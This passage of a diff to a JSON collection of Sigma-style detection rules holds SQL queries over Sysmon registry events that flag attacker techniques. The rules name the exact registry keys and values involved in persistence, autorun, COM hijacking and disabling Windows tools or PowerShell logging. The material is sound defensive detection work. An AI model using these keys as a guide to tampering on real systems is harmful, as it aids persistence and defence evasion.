user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion" ], "falsepositives": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (Details LIKE '%00000429%' ESCAPE '\\' OR Details LIKE '%00050429%' ESCAPE '\\' OR Details LIKE '%0000042a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_susp_keyboard_layout_load.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "Classes Autorun Keys Modification", - "id": "9df5f547-c86a-433e-b533-f2794357e242", + "title": "Potential PendingFileRenameOperations Tamper", + "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Installers and updaters may set currently in use files for rename after a reboot." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Details = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regedit.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml" + "filename": "registry_set_susp_pendingfilerenameoperations.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "Registry Hide Function from User", + "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_set_hide_function_user.yml" }, { - "title": "Service Binary in Uncommon Folder", - "id": "277dc340-0540-42e7-8efb-5ff460045e07", + "title": "Disable Internal Tools or Feature in Registry", + "id": "e2482f8d-3443-4237-b906-cc145d87a076", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_creation_service_uncommon_folder.yml" + "filename": "registry_set_disable_function_user.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "status": "test", + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "author": "Sittikorn S", + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + }, + { + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_set_persistence_chm.yml" }, { "title": "New DNS ServerLevelPluginDll Installed", @@ -33355,190 +33108,186 @@ "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", - "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Common Autorun Keys Modification", + "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR Details IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_set_asep_reg_keys_modification_common.yml" }, { - "title": "ETW Logging Disabled For rpcrt4.dll", - "id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "title": "Potential Persistence Via COM Search Order Hijacking", + "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", "status": "experimental", - "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unknown" + "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\Rpc\\\\ExtErrorInformation' ESCAPE '\\' AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000002)'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((Details LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR Details LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (Details LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Details LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (Image LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Details LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (Details LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_rpcrt4_etw_tamper.yml" + "filename": "registry_set_persistence_search_order.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "title": "ScreenSaver Registry Key Set", + "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011" ], "falsepositives": [ - "Administrator actions" + "Legitimate use of screen saver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND Details LIKE '%.scr' ESCAPE '\\') AND NOT ((Details LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_set_scr_file_executed_by_rundll32.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", - "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE 